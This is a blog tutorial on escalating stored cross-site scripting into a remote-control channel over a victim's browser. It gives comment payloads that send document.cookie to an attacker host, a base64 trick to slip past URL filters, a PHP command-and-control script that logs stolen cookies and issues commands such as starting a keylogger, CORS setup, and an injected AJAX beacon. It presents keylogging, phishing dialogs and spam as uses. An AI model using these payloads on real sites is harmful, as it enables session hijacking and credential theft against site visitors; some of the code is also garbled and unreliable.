Escalating XSS to control browser with malicius AJAX payload injection

Hello Friends, Welcome again. Today, i will explain how to exploit XSS with AJAX payload at very basic level.

What is benefit of injecting AJAX payload, instead of javascript payload?

With AJAX I can create a complete C&C like environment to control victim browser, which receive commands from hacker server at runtime, execute commands, instructions, and report results back to attacker server. Examples of commands are :

  • Hacking cookies
  • Browser keylogging,
  • Show phishing dialogs to victim to credentials harvesting,
  • Open popups/popunders
  • Using victim browser as proxy.
  • Sending spam emails
  • clicking ads

We can not simulate C&C environment with javascript. I must say, in this scenario javascript is ONE time, and AJAX is ALL time connectivity with victim browser.

What is XSS and how to exploit?

XSS stands for Cross Site Scripting. It is a process in which hacker inject malicious script to vulnerable website. Lets understand with an example. Assume there is blog where writers publish there articles. Visitors read blog articles to learn knowledge, and also give feedback about articles in comments section. Comments are saved in backend database. Now, a hacker can injection malicious script to comments section, which is also saved on server database as well. When another user reach to blog articles, comments of other users are displayed as well.  For browser, article and comments are html, javascript, AJAX instructions, that browser will execute without distinguishing html content was actually created by website developer, article writer, or hacker.

Hacking cookies with malicious payload:

Very helpful article! 
new Image().src="http://hackersite.com/save.php?cc" %2b escape(document.cookie);

If URL keywords like http:// are blocked on server, you can use btoa(BASE_64_ENCODED_URL):

Very helpful article! 
 new Image().src= btoa( aHR0cDovL2hhY2tlcnNpdGUuY29tL3NhdmUucGhwP2Nj) %2b escape(document.cookie);

Script will read cookies and send to hackersite.com. We hacked cookies.

Escalating XSS to control victim browser

Now we want to go ahead one step further to leverage XSS to control victim browser.

What is Same Origin Policy, aka SOP?

Same Origin Policy is security feature implemented in browser to stop hackers reading DOM of websites which hacker does not own. SOP is enabled in all browsers by default.

SOP says, script in one domain context can send http request to a resource over another domain, but can not read response. Request is there, but no response available.

What is necessary configuration required?

We have to enable Cross Origin Resource Sharing CORS on our hacking web server. As hacker, CORS need to be enabled on attacker web server.

How to enable CORS?

I created .htaccess in root directory of my website with following contents:

Header set Access-Control-Allow-Origin "*"

Here is attacker webserver IP address: 192.168.8.100

Without CORS error comes

Failed to load http://192.168.8.100/server.php: No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘http://192.168.8.101’ is therefore not allowed access.

Server PHP Script to send commands and receive response

I created server.php which save received query string data to logs.txt and send commands:

<?php
error_reporting(0); // Turn of error reporting
//save received data to logs.txt
file_put_contents('logs.txt',"[ " . date("Y-m-d h:i:sa ") . " ]\r\n[" . $_REQUEST["cc"] . "]\r\n\r\n" , FILE_APPEND | LOCK_EX);
// I am sending static commands.
// You insert commands to database and read here new commands from database.
$commands = array("commands"=>array("startKeylogger","fetchCookies","cmd3"));
echo json_encode($commands);
?>

Now, i will inject malicius comment as:

Nice article
https://AJAX.googleapis.com/AJAX/libs/jquery/3.3.1/jquery.min.js

var dataString = "cc=" + escape(document.cookie);
$.AJAX({
    url:"http://192.168.8.100/server.php",
    data: dataString,
    dataType: "json",
    success:function(data){
       console.log("commands: " + data.commands.toString());
      // execute commands here, and report back to server with results.
     // check server periodically for new commands.
    }
});
 

Since CORS is enabled, this script executing in origin http://192.168.8.100/dvwa/vulnerabilities/xss_s/index.php can request and read response from http://192.168.8.101/server.php

Thanks to CORS.

Conclusion

Objective of this article was to present benefits of injecting AJAX payload while exploiting XSS, to control victim browser, how to achieve this goal as very basic level. Once, we are controlling victim browser, we can execute many commands at run time including but not limited to Browser keylogging, display phishing dialogs for credentials harvesting, open popups, popunders and using victim browser as proxy. And important configuration required is on our attacking webserver to enable CORS on attacking webserver.

Ok, that is all for this article, i hope you learned something from this article. Please let me know your feedback for improvement.

Lastly, I want to say thanks to Syed Ishaq and Mukarram Khalid for encouraging me to pursue publishing blog articles. And thanks to everyone who read my article.

Good bye for now, see you next time with a new article! AH

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s